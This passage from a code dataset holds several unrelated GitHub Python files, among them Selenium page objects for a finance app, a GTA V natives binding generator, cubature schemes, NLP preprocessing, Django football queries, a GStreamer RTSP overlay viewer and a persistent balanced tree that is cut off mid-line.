'#date-input[form=\"transaction-form\"]'\n self.date_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#transaction-size-input[form=\"transaction-form\"]'\n self.transaction_size_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#description-input[form=\"transaction-form\"]'\n 
self.description_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#submit-button[form=\"transaction-form\"]'\n self.submit_button = driver.find_element_by_css_selector(css_selector)\n self.repeat_checkbox = driver.find_element_by_id('repeat-checkbox')\n self.repeat_options = RepeatOptions(self.driver)\n\n def create_transaction(\n self,\n date,\n size,\n description=\"\",\n repeats='does_not_repeat',\n ends=None,\n steps=None,\n frequency=None):\n \n self.date = date\n self.transaction_size_input.send_keys(size)\n self.description_input.send_keys(description)\n if repeats == 'does_not_repeat':\n if self.repeat_checkbox.is_selected():\n self.repeat_checkbox.click()\n self.submit_button.click()\n else:\n if not self.repeat_checkbox.is_selected():\n self.repeat_checkbox.click()\n self.set_repeat_frequency(repeats, steps)\n self.set_end_criteria(ends)\n self.repeat_options.submit()\n\n @property\n def date(self):\n return strptime(self.date_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @date.setter\n def date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.date_input.send_keys(keys)\n\n @property\n def transaction_size(self):\n return float(self.transaction_size_input.get_attribute('value'))\n\n @transaction_size.setter\n def transaction_size(self, transaction_size):\n self.transaction_size_input.send_keys(transaction_size)\n\n @property\n def description(self):\n return float(self.description_input.get_attribute('value'))\n\n @description.setter\n def description(self, description):\n self.description_input.send_keys(description)\n\n def submit(self):\n WebDriverWait(self.driver, 10).until(\n EC.invisibility_of_element_located((By.ID, 'repeat-options-div'))\n )\n self.submit_button.click()\n\n def set_repeat_frequency(self, frequency, steps=1):\n self.repeat_options.set_frequency(frequency, steps)\n\n def set_end_criteria(self, ends):\n self.repeat_options.set_end_criteria(ends)\n \nclass Menu:\n\n def __init__(self, driver):\n self.element = driver.find_element_by_id('menu')\n self.sign_out_button = driver.find_element_by_id('sign-out')\n\nclass TransactionList:\n\n def __init__(self, driver):\n\n self.element = driver.find_element_by_id('transaction-list')\n self.date_header = self.element.find_element_by_id('date-header')\n self.transaction_size_header = self.element.find_element_by_id('transaction-size-header')\n self.description_header = self.element.find_element_by_id('description-header')\n self.closing_balance_header = self.element.find_element_by_id('closing-balance-header')\n\n def get_transactions(self):\n transactions = []\n for e in self.element.find_elements_by_css_selector('.transaction'):\n transactions.append(Transaction(e))\n return transactions\n\nclass BalanceChart:\n\n def __init__(self, driver):\n self.element = driver.find_element_by_id('balance-chart')\n self.canvas = self.element.find_element_by_id('canvas')\n self.x_axis = self.canvas.find_element_by_id('x-axis')\n self.y_axis = self.canvas.find_element_by_id('y-axis')\n self.plot_area = self.canvas.find_element_by_id('plot-area')\n WebDriverWait(self.element, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.bar'))\n )\n self.bars = [BalanceBar(element) for element in self.plot_area.find_elements_by_css_selector('.bar')]\n self.y_ticks = self.y_axis.text.split('\\n')\n self.x_ticks = self.x_axis.text.split('\\n')\n\nclass BalanceBar:\n\n def __init__(self, element):\n self.element = element\n self.balance = 
float(self.element.get_attribute('balance'))\n self.date = datetime.datetime.strptime(self.element.get_attribute('date'), '%Y-%m-%d').date()\n\nclass Transaction:\n\n def __init__(self, element):\n self.element = element\n self.date_input = self.element.find_element_by_css_selector('.date-input')\n self.size_input = self.element.find_element_by_css_selector('.transaction-size-input')\n self.description_input = self.element.find_element_by_css_selector('.description-input')\n self.balance_element = self.element.find_element_by_css_selector('.transaction-balance')\n self.id = self.element.find_element_by_css_selector('.id')\n self.save_button = self.element.find_element_by_css_selector('.save-transaction-button')\n self.delete_button = self.element.find_element_by_css_selector('.delete-transaction-button')\n \n @property\n def date(self):\n return datetime.datetime.strptime(self.date_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @date.setter\n def date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.date_input.send_keys(keys)\n\n @property\n def size(self):\n return float(self.size_input.get_attribute('value'))\n\n @size.setter\n def size(self, size):\n self.size_input.clear()\n self.size_input.send_keys(size)\n\n @property\n def description(self):\n return self.description_input.get_attribute('value')\n\n @description.setter\n def description(self, description):\n self.description_input.clear()\n self.description_input.send_keys(description)\n\n @property\n def balance(self):\n return self.balance_element.text\n\n def save(self):\n # WebDriverWait(self.element, 10).until(\n # lambda x: self.save_button.is_displayed\n # )\n self.save_button.click()\n\n def delete(self):\n self.delete_button.click()\n\n\nclass DateSelector:\n\n def __init__(self, element):\n self.element = element\n self.start_input = self.element.find_element_by_id('start-input')\n self.end_input = self.element.find_element_by_id('end-input')\n self.submit_button = self.element.find_element_by_css_selector('input[type=\"submit\"]')\n\n @property\n def start(self):\n return datetime.datetime.strptime(self.start_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @start.setter\n def start(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.start_input.send_keys(keys)\n\n @property\n def end(self):\n return datetime.datetime.strptime(self.end_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @end.setter\n def end(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.end_input.send_keys(keys)\n\n def submit(self):\n self.submit_button.click()\n\nclass RepeatOptions:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('repeat-options-div')\n self.close_button = driver.find_element_by_id('repeat-options-close-button')\n self.submit_button = driver.find_element_by_id('repeat-options-submit-button')\n self.ends_after_n_transactions = self.element.find_element_by_id('ends-after-n-transactions')\n self.n_transactions_input =self.element.find_element_by_id('n-transactions-input')\n self.ends_on_date = self.element.find_element_by_id('ends-on-date')\n self.end_date_input = self.element.find_element_by_id('ends-on-date-input')\n self.never_ends = self.element.find_element_by_id('never-ends')\n self.frequency_input = Select(self.element.find_element_by_id('frequency-input'))\n self.steps_input = self.element.find_element_by_id('steps-input')\n\n def submit(self):\n 
WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, \"repeat-options-submit-button\"))\n )\n self.submit_button.click()\n WebDriverWait(self.driver, 10).until(\n EC.invisibility_of_element_located((By.ID, \"repeat-options-submit -button\"))\n )\n\n def select(self, option):\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, 'ends-after-n-transactions'))\n )\n if option == 'ends_after_#_transactions':\n self.ends_after_n_transactions.click()\n elif option == 'ends_on_date':\n self.ends_on_date.click()\n elif option == 'never':\n self.never_ends.click()\n\n def set_n_transactions(self, transactions):\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, self.n_transactions_input.get_attribute('id')))\n )\n self.n_transactions_input.clear()\n self.n_transactions_input.send_keys(transactions)\n \n def set_end_date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.end_date_input.send_keys(keys)\n\n def set_frequency(self, frequency, steps=None):\n self.frequency_input.select_by_value(frequency)\n WebDriverWait(self.driver, 60).until(\n EC.visibility_of_element_located((By.ID, self.steps_input.get_attribute('id')))\n )\n if steps is not None:\n self.steps_input.clear()\n self.steps_input.send_keys(steps)\n\n def set_end_criteria(self, ends):\n self.select(ends['how'])\n if ends['how'] == 'never_ends':\n pass\n elif ends['how'] == 'ends_after_#_transactions':\n self.set_n_transactions(ends['when'])\n elif ends['how'] == 'ends_on_date':\n self.set_end_date(ends['when'])\n else:\n raise Exception('unrecognised end criteria: {}'.format(ends))\n\nclass RepeatTransactionsList:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('repeat-transactions')\n self.table = self.element.find_element_by_tag_name('table')\n\n def assert_in(self, date, size, description, repeats, ends):\n x = (date, size, description, repeats, ends)\n assert len(list(filter(lambda y: y == x, self.items))) > 0\n\n @property\n def items(self):\n rows = self.table.find_elements_by_css_selector('.repeat-transaction')\n items = []\n for row in rows:\n tds = row.find_elements_by_tag_name('td')\n date_input = tds[0].find_element_by_tag_name('input')\n date = strptime(date_input.get_attribute('value'), '%Y-%m-%d').date()\n size_input = tds[1].find_element_by_tag_name('input')\n size = float(size_input.get_attribute('value').replace('£', ''))\n description_input = tds[2].find_element_by_tag_name('input')\n description = description_input.get_attribute('value')\n repeats_input = tds[3].find_element_by_tag_name('input')\n repeats = repeats_input.get_attribute('value')\n ends_input = tds[4].find_element_by_tag_name('input')\n ends = ends_input.get_attribute('value')\n repeat_transaction = {\n 'date': date,\n 'size': size,\n 'description': description,\n 'repeats': repeats,\n 'ends': ends\n }\n\n items.append(repeat_transaction)\n return items\n","repo_name":"dvoong/voong_finance_3","sub_path":"functional_tests/homepage/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":15825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40434196294","text":"import json\n\nnatives = json.load(open(\"natives.json\"))\nout_file : str = \"\"\n\ndef sanitize_param(name):\n if name in [\"repeat\", \"end\"]:\n return \"_\"+name\n else:\n return name\n\ndef make_param_listing(params):\n pms = \"\"\n for 
param in params:\n pms += sanitize_param(param[\"name\"])\n pms += \",\"\n pms = pms.rstrip(\",\")\n return pms\n\ndef is_string(type: str):\n return type.find(\"char*\") != -1\n\ndef is_pointer(type: str):\n \"\"\"also returns true for string\"\"\"\n return type.find('*') != -1\n\n\ndef write_native(name, hash, params, return_type):\n global out_file\n\n out_file += f\"{name}=function({make_param_listing(params)})\"\n\n invoke_type = \"invoke_int\"\n\n if (return_type == \"void\"):\n invoke_type = \"invoke_void\"\n elif (return_type == \"float\"):\n invoke_type = \"invoke_float\"\n elif (return_type == \"BOOL\"):\n invoke_type = \"invoke_bool\"\n elif (return_type == \"const char*\"):\n invoke_type = \"invoke_str\"\n elif (return_type == \"Vector3\"):\n invoke_type = \"invoke_vec3\"\n elif (return_type.endswith(\"*\")):\n invoke_type = \"invoke_ptr\"\n\n out_file += f\"return _natives.{invoke_type}({hash},\"\n for param in params:\n out_file += f\"{sanitize_param(param['name'])},\"\n out_file = out_file.removesuffix(\",\")\n out_file += \");end,\\n\"\n\ndef write_namespace(name, data):\n global out_file\n\n out_file += f\"{name} = {{\\n\"\n\n for (hash, more) in data.items():\n write_native(more[\"name\"], hash, more[\"params\"], more[\"return_type\"])\n \n out_file += \"};\\n\"\n\ndef write_file():\n for (namespace, data) in natives.items():\n write_namespace(namespace, data)\n\ndef convert_and_write_cpp_file():\n global out_file\n\n cpp_data = \"#pragma once\\n// clang-format off\\n// Generated by natives_gen.py. DO NOT EDIT\\nchar natives_data[] = \\n\"\n\n lines = out_file.rstrip('\\n').splitlines()\n for line in lines:\n cpp_data += f\"\\\"{line}\\\\n\\\"\\\\\\n\"\n \n cpp_data = cpp_data.rstrip('\\n\\\\')\n cpp_data += \";\\n// clang-format on\\n\"\n cpp_data += \"int natives_size = sizeof(natives_data)-1;\"\n open(\"natives_data.cpp\", \"w+\").write(cpp_data)\n\ndef write_lua_file():\n open(\"natives.lua\", \"w+\").write(out_file)\n\nif __name__ == \"__main__\":\n write_file()\n convert_and_write_cpp_file()","repo_name":"JosephAJJames/DLL-GTAV","sub_path":"src/lua/natives/natives_gen.py","file_name":"natives_gen.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30920839198","text":"from sympy import Rational as frac\nfrom sympy import sqrt\n\nfrom ..helpers import article\nfrom ._helpers import QuadrilateralScheme, concat, symm_r0, symm_s, zero\n\ncitation = article(\n authors=[\"G.W. Tyler\"],\n title=\"Numerical integration of functions of several variables\",\n journal=\"Canad. J. 
Math.\",\n volume=\"5\",\n year=\"1953\",\n pages=\"393-412\",\n url=\"https://doi.org/10.4153/CJM-1953-044-1\",\n)\n\n\ndef tyler_1():\n weights, points = concat(\n zero(-frac(28, 45)),\n symm_s([frac(1, 36), 1]),\n symm_r0([frac(1, 45), 1], [frac(16, 45), frac(1, 2)]),\n )\n weights *= 4\n return QuadrilateralScheme(\"Tyler 1\", weights, points, 5, citation)\n\n\ndef tyler_2():\n r = sqrt(frac(6, 7))\n s, t = [sqrt((114 - i * 3 * sqrt(583)) / 287) for i in [+1, -1]]\n B1 = frac(49, 810)\n B2, B3 = [(178981 + i * 2769 * sqrt(583)) / 1888920 for i in [+1, -1]]\n weights, points = concat(symm_r0([B1, r]), symm_s([B2, s], [B3, t]))\n weights *= 4\n return QuadrilateralScheme(\"Tyler 2\", weights, points, 7, citation)\n\n\ndef tyler_3():\n weights, points = concat(\n zero(frac(449, 315)),\n symm_r0(\n [frac(37, 1260), 1], [frac(3, 28), frac(2, 3)], [-frac(69, 140), frac(1, 3)]\n ),\n symm_s([frac(7, 540), 1], [frac(32, 135), frac(1, 2)]),\n )\n weights *= 4\n return QuadrilateralScheme(\"Tyler 3\", weights, points, 7, citation)\n","repo_name":"LJPapenfort/quadpy","sub_path":"quadpy/quadrilateral/_tyler.py","file_name":"_tyler.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"36927988421","text":"\nimport stanza\n\nimport re\n\nfrom nltk import pos_tag\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords \n\nfrom collections import Counter\n\n\ndef normalize(s):\n replacements = (\n (\"á\", \"a\"),\n (\"é\", \"e\"),\n (\"í\", \"i\"),\n (\"ó\", \"o\"),\n (\"ú\", \"u\"),\n (\"ä\", \"a\"),\n (\"ë\", \"e\"),\n (\"ï\", \"i\"),\n (\"ö\", \"o\"),\n (\"ü\", \"u\"),\n )\n for a, b in replacements:\n s = s.replace(a, b).replace(a.upper(), b.upper())\n return s\n\n\n\n\ndef lematizar(raw_text, nlp):\n palabras = nlp(raw_text)\n tokens = []\n for sentence in palabras.sentences:\n for word in sentence.words:\n tokens.append(word.lemma)\n return tokens\n\n\n#Funcion para remover stop words de una lista de tokens\ndef rem_stop_words(tokens, language):\n stop_words = set(stopwords.words(language))\n \n \n\n filtered_sentence = [w for w in tokens if not w in stop_words] \n return filtered_sentence\n\n\n\ndef tokenize(raw_text, nlp, language, lemmatize, rem_stop):\n \"\"\" Tokenizes and lemmatizes a raw text \"\"\"\n #Tokenizador: hace algunas modificaciones (replace) que hace un mini preprocesamiento para q funciona bien\n \n raw_text = raw_text.replace(\"\\'\", \"'\")\n raw_text = raw_text.replace(\"/\", \" / \")\n raw_text = raw_text.replace(\"

\", \"\\n\")\n raw_text = normalize(raw_text) #Quito tildes\n \n #Lematizo, devuelve el texto tokenizado si es True \n \n if lemmatize:\n tokens = lematizar(raw_text, nlp)\n \n #SI se apaga el lematizador, tokenizo manualmente\n else:\n sentences = sent_tokenize(raw_text) #Tokenizador\n tokens = [e2 for e1 in sentences for e2 in word_tokenize(e1)] # Nested list comprehension. Para cada palabra, mete el tokenizador\n \n tokens = [e for e in tokens if re.compile(\"[A-Za-z]\").search(e[0])] #Se queda con todas las palabras q tienen caracteres alfanumericos (vuela comas)\n \n tokens = [e.lower() for e in tokens]\n\n if rem_stop:\n #Quita stopwords\n tokens = rem_stop_words(tokens, language)\n \n \n return(tokens)\n\n\ndef procesar_articulos(articulos, nlp, language='english', lemmatize = True, rem_stop = True ):\n articulos_procesados = list()\n for idx in range(len(articulos)):\n if idx%100==0:\n print(idx)\n art = articulos[idx]\n articulo_tokenizado = tokenize(art, nlp, language, lemmatize = lemmatize, rem_stop = rem_stop )\n articulos_procesados.append(\" \".join(articulo_tokenizado))\n return articulos_procesados\n\n","repo_name":"scis12/LDA-clustering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1282295519","text":"from bundesliga_app.models import (\n Match,\n Wins_Losses_Season,\n Team\n)\nfrom django.db.models import Q\n\ndef create_wins_losses_season(team_id, league_shortcut, league_season):\n new_wins_losses_season = Wins_Losses_Season(\n team_id=team_id,\n wins=0,\n loses=0,\n season=league_season,\n league=league_shortcut\n )\n\n new_wins_losses_season.save()\n\n\ndef create_match(match, league_shortcut, league_season):\n if not match['MatchIsFinished']:\n points_one = None\n points_two = None\n else:\n points_one = match['MatchResults'][1]['PointsTeam1']\n points_two = match['MatchResults'][1]['PointsTeam2']\n\n new_match = Match(\n match_id=match['MatchID'],\n date=match['MatchDateTimeUTC'],\n team_one_id=match['Team1']['TeamId'],\n team_two_id=match['Team2']['TeamId'],\n points_one=points_one,\n points_two=points_two,\n season=league_season,\n league=league_shortcut,\n gameday = int(match['Group']['GroupName'].split('.')[0]),\n is_finished=match['MatchIsFinished']\n )\n new_match.save()\n\n\ndef get_unfinished_matches(league_shortcut, league_season):\n unfinished_matches = Match.objects.filter(league=league_shortcut, is_finished=False)\n\n return unfinished_matches\n\n\ndef get_all_matches(league_shortcut, league_season):\n matches = Match.objects.filter(league=league_shortcut, season=league_season).order_by('date')\n\n return matches\n\n\ndef get_matches_after_gameday(league_shortcut, league_season, current_gameday):\n matches = Match.objects.filter(league=league_shortcut, season=league_season, gameday__gt=current_gameday)\n\n return matches\n\n\ndef get_wins_losses(league_shortcut, league_season):\n win_loss_ratios = Wins_Losses_Season.objects.filter(league=league_shortcut, season=league_season)\n\n return win_loss_ratios\n\n\ndef get_teams_with_name(team_name):\n teams = Team.objects.filter(name__icontains=team_name)\n\n return teams\n\n\ndef get_wins_losses_for_team(team_id):\n wins_losses_for_team = Wins_Losses_Season.objects.get(team_id=team_id)\n\n return wins_losses_for_team\n\n\ndef get_past_matches_for_team(team_id):\n matches = Match.objects.filter(Q(team_one_id=team_id) | Q(team_two_id=team_id), 
is_finished=True)\\\n .select_related()\\\n .order_by('date')\n\n return matches\n\n\ndef get_next_matches_for_team(team_id):\n matches = Match.objects.filter(Q(team_one_id=team_id) | Q(team_two_id=team_id), is_finished=False)\\\n .select_related()\\\n .order_by('date')\n\n return matches\n","repo_name":"SVladkov/Bundesliga","sub_path":"bundesliga_app/data/local_database.py","file_name":"local_database.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28241964974","text":"import os\r\nimport config\r\n\r\nimport cairo\r\n\r\n\r\nfrom gi.repository import Gst, GLib\r\nimport sys\r\nimport gi\r\n\r\ngi.require_version('Gst', '1.0')\r\n\r\n# gst pipeline\r\n# gst-launch-1.0 rtspsrc location='rtsp://makepluscode:000000@192.168.219.155/stream1' ! rtph264depay ! h264parse ! decodebin ! videoconvert ! autovideosink\r\n\r\nOVERLAY_FRAME_WIDTH = 1920\r\nOVERLAY_FRAME_HEIGHT = 1080\r\n\r\n\r\ndef graph_pipeline(pipeline):\r\n Gst.debug_bin_to_dot_file(pipeline, Gst.DebugGraphDetails.ALL,\r\n \"pipeline\")\r\n try:\r\n os.system(\"dot -Tpng -o ./pipeline.png ./pipeline.dot\")\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef on_message(bus: Gst.Bus, message: Gst.Message, loop: GLib.MainLoop):\r\n msg = message.type\r\n\r\n if msg == Gst.MessageType.EOS:\r\n print(\"on_message : End Of Stream\")\r\n loop.quit()\r\n\r\n elif msg == Gst.MessageType.WARNING:\r\n err, debug = message.parse_warning()\r\n print(\"on_message : Warnning -\", err, debug)\r\n\r\n elif msg == Gst.MessageType.ERROR:\r\n err, debug = message.parse_error()\r\n print(\"on_message : Error -\", err, debug)\r\n loop.quit()\r\n\r\n elif msg == Gst.MessageType.INFO:\r\n err, debug = message.parse_info()\r\n print(\"on_message : Info -\", err, debug)\r\n\r\n return True\r\n\r\n\r\ndef on_draw(_overlay, context, _timestamp, _duration):\r\n # print(\"*_overlay = \", _overlay, \"context = \",\r\n # context, \"*_timestamp = \", _timestamp)\r\n\r\n # creating shape\r\n context.rectangle(900, 500, 120, 80)\r\n\r\n # setting color of the context\r\n context.set_source_rgba(1.0, 0.0, 0.0, 0.5)\r\n\r\n # fill the color inside\r\n context.fill()\r\n\r\n # creating shape\r\n context.rectangle(1020, 500, 120, 80)\r\n\r\n # setting color of the context\r\n context.set_source_rgba(0.0, 1.0, 0.0, 1.0)\r\n\r\n # Setting outline width\r\n context.set_line_width(4)\r\n\r\n # stroke out the color and width property\r\n context.stroke()\r\n\r\n text = 'Hello, makepluscode'\r\n (x, y, w, h, dx, dy) = context.text_extents(text)\r\n context.select_font_face(\r\n 'Open Sans', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)\r\n context.set_font_size(40)\r\n context.set_source_rgba(0.0, 0.0, 0.0, 1.0)\r\n context.move_to((OVERLAY_FRAME_WIDTH - w) / 2.0,\r\n (OVERLAY_FRAME_HEIGHT - h) / 2.0)\r\n context.show_text(text)\r\n\r\n\r\ndef create_pipepline(pipeline: Gst.Pipeline):\r\n src = Gst.ElementFactory.make(\"rtspsrc\", \"src\")\r\n src.set_property(\r\n \"location\", \"rtsp://\" + config.USERNAME + \":\" + config.PASSWORD + \"@\" + config.IPADDRESS + \"/stream1\")\r\n src.set_property(\"latency\", 0)\r\n src.set_property(\"drop-on-latency\", True)\r\n # src.set_property(\"udp-buffer-size\", 2097152)\r\n\r\n queue = Gst.ElementFactory.make(\"queue\", \"queue\")\r\n queue.set_property(\"max-size-buffers\", 4)\r\n depay = Gst.ElementFactory.make(\"rtph264depay\", \"depay\")\r\n parse = Gst.ElementFactory.make(\"h264parse\", \"parse\")\r\n decode = 
Gst.ElementFactory.make(\"avdec_h264\", \"decode\")\r\n convert = Gst.ElementFactory.make(\"videoconvert\", \"convert\")\r\n overlay = Gst.ElementFactory.make(\"cairooverlay\", \"overlay\")\r\n overlay.connect('draw', on_draw)\r\n sink = Gst.ElementFactory.make(\"autovideosink\", \"sink\")\r\n\r\n if (not src or not depay or not parse or not decode or not convert or not sink):\r\n print(\"ERROR: Not all elements could be created.\")\r\n sys.exit(1)\r\n\r\n pipeline.add(src)\r\n pipeline.add(queue)\r\n pipeline.add(depay)\r\n pipeline.add(parse)\r\n pipeline.add(decode)\r\n pipeline.add(convert)\r\n pipeline.add(overlay)\r\n pipeline.add(sink)\r\n\r\n def on_rtspsrc_pad_added(rtspsrc, pad, depay):\r\n print(pad.name)\r\n src.link(queue)\r\n queue.link(depay)\r\n\r\n src.connect(\"pad-added\", on_rtspsrc_pad_added, depay)\r\n\r\n ret = depay.link(parse)\r\n ret = ret and parse.link(decode)\r\n ret = ret and decode.link(convert)\r\n ret = ret and convert.link(overlay)\r\n ret = ret and overlay.link(sink)\r\n\r\n if not ret:\r\n print(\"ERROR: Elements could not be linked\")\r\n sys.exit(1)\r\n else:\r\n print(\"DONE: Elements could be linked\")\r\n\r\n return True\r\n\r\n\r\ndef main():\r\n Gst.init(sys.argv)\r\n\r\n Gst.debug_set_active(True)\r\n Gst.debug_set_default_threshold(3)\r\n\r\n # create a pipeline with factory\r\n pipeline = Gst.Pipeline()\r\n\r\n create_pipepline(pipeline)\r\n\r\n pipeline.set_state(Gst.State.PLAYING)\r\n\r\n loop = GLib.MainLoop()\r\n\r\n # connect bus to catch signal from the pipeline\r\n bus = pipeline.get_bus()\r\n bus.add_signal_watch()\r\n bus.connect(\"message\", on_message, loop)\r\n\r\n graph_pipeline(pipeline)\r\n\r\n # run\r\n try:\r\n loop.run()\r\n except:\r\n pass\r\n\r\n # if fails, then clean\r\n pipeline.set_state(Gst.State.NULL)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"makepluscode/gstreamer-examples-python","sub_path":"13-rtspsrc-cairooveray/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"23077950579","text":"import pandas as pd\nimport numpy as np\nfrom .AnalysisUtilities import AnalysisUtilities as util\n\ndef custom_analysis(batch_df: pd.DataFrame, uniprot_id: str, PDB_path: str, PAE_path: str):\n \n dataColumns = {'uniprot': [], 'position': [], 'error': [], 'plDDT_5.0A': [], 'plDDT_1res': [], 'plDDT_31res': [], 'PAE_5.0A_allPairs': [], 'num_neighbours_5.0A': []}\n \n AFModel = util.load_alphafold(uniprot_id, PDB_path, PAE_path)\n \n if AFModel == False:\n util.append_error_message('PDB/PAE files not found', dataColumns)\n returnDataframe = pd.DataFrame(dataColumns)\n return (returnDataframe, uniprot_id)\n \n modelLength = AFModel.get_chain('A').length\n \n for position in range(1, modelLength+1):\n dataColumns['uniprot'].append(uniprot_id)\n dataColumns['position'].append(position)\n dataColumns['error'].append('OK')\n dataColumns['plDDT_5.0A'].append(AFModel.get_local_plddt(position,radius=5))\n dataColumns['plDDT_1res'].append(AFModel.get_plddt(position)[0])\n dataColumns['plDDT_31res'].append(np.around(AFModel.get_plddt_window(position, window=31)[0],3))\n dataColumns['PAE_5.0A_allPairs'].append(np.around(AFModel.get_local_PAE(position, radius=5, with_query_only=True), 3))\n dataColumns['num_neighbours_5.0A'].append(len(AFModel.get_residues_within(position, radius=5)))\n \n returnDataframe = pd.DataFrame(dataColumns)\n \n return (returnDataframe, uniprot_id)\n \n 
","repo_name":"Levurmion/multiprocessing_pipeline","sub_path":"scripts/custom_analysis_functions/background_residue_metrics.py","file_name":"background_residue_metrics.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15665521016","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1.2'\n\nsetup(\n name = 'logsanitizer',\n version = version,\n description = \"Log processing and sanitizer tool written in Python.\",\n packages = find_packages( exclude = [ 'ez_setup'] ),\n include_package_data = True,\n zip_safe = False,\n author = 'Bence Faludi',\n author_email = 'befaludi@microsoft.com',\n license = 'MIT',\n install_requires = [\n 'pyyaml'\n ],\n entry_points={\n 'console_scripts': [\n 'logsanitizer = logsanitizer:main',\n ],\n },\n test_suite = \"logsanitizer.tests\",\n url = 'http://6wunderkinder.com'\n)\n","repo_name":"microsoftarchive/logsanitizer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"27551966649","text":"class Animal:\n species = \"Animal\"\n\n def __init__(self, weight: int):\n self.weight = weight\n\n @staticmethod\n def speak():\n print(\"I'm an animal.\")\n\n\n# Dog会继承Animal的方法与属性\nclass Dog(Animal):\n\n @staticmethod\n def bark():\n print(\"Woof!\")\n\n # 重写父类方法\n # def speak(self):\n # print(\"I'm a dog !\")\n\n\nif __name__ == '__main__':\n my_dog = Dog(1)\n my_dog.speak()\n my_dog.bark()\n print(my_dog.weight)\n","repo_name":"lincvic/py-basic","sub_path":"h_oop_example/oop_inheritance_example.py","file_name":"oop_inheritance_example.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33295522774","text":"from math import sqrt\nfrom typing import Generic, Iterable, Optional, TypeVar, Callable, List, Tuple, Final\nT = TypeVar('T')\n\nclass PersistentWBTreeList(Generic[T]):\n\n ALPHA: Final[float] = 1 - sqrt(2) / 2\n BETA : Final[float] = (1 - 2*ALPHA) / (1 - ALPHA)\n\n class Node():\n\n def __init__(self, key: T):\n self.key: T = key\n self.left: Optional[PersistentWBTreeList.Node] = None\n self.right: Optional[PersistentWBTreeList.Node] = None\n self.size: int = 1\n\n def copy(self) -> 'PersistentWBTreeList.Node':\n node = PersistentWBTreeList.Node(self.key)\n node.left = self.left\n node.right = self.right\n node.size = self.size\n return node\n\n def balance(self) -> float:\n return ((self.left.size if self.left else 0)+1) / (self.size+1)\n\n def __str__(self):\n if self.left is None and self.right is None:\n return f'key={self.key}, size={self.size}\\n'\n return f'key={self.key}, size={self.size},\\n left:{self.left},\\n right:{self.right}\\n'\n\n __repr__ = __str__\n\n def __init__(self,\n a: Iterable[T],\n _root: Optional[Node]=None\n ) -> None:\n self.root: Optional[PersistentWBTreeList.Node] = _root\n a = list(a)\n if a:\n self._build(list(a))\n\n def _build(self, a: List[T]) -> None:\n Node = PersistentWBTreeList.Node\n def build(l: int, r: int) -> Node:\n mid = (l + r) >> 1\n node = Node(a[mid])\n if l != mid:\n node.left = build(l, mid)\n if mid+1 != r:\n node.right = build(mid+1, r)\n self._update(node)\n return node\n self.root = build(0, len(a))\n\n def _update(self, node: Node) -> None:\n if node.left is None:\n if node.right is None:\n node.size = 1\n else:\n node.size = 
1 + node.right.size\n else:\n if node.right is None:\n node.size = 1 + node.left.size\n else:\n node.size = 1 + node.left.size + node.right.size\n\n def _rotate_right(self, node: Node) -> Node:\n assert node.left\n u = node.left.copy()\n node.left = u.right\n u.right = node\n self._update(node)\n self._update(u)\n return u\n\n def _rotate_left(self, node: Node) -> Node:\n assert node.right\n u = node.right.copy()\n node.right = u.left\n u.left = node\n self._update(node)\n self._update(u)\n return u\n\n def _balance_left(self, node: Node) -> Node:\n assert node.right\n node.right = node.right.copy()\n u = node.right\n if u.balance() >= self.BETA:\n assert u.left\n node.right = self._rotate_right(u)\n u = self._rotate_left(node)\n return u\n\n def _balance_right(self, node: Node) -> Node:\n assert node.left\n node.left = node.left.copy()\n u = node.left\n if u.balance() <= 1 - self.BETA:\n assert u.right\n node.left = self._rotate_left(u)\n u = self._rotate_right(node)\n return u\n\n def _merge_with_root(self, l: Optional[Node], root: Node, r: Optional[Node]) -> Node:\n ls = l.size if l else 0\n rs = r.size if r else 0\n diff = 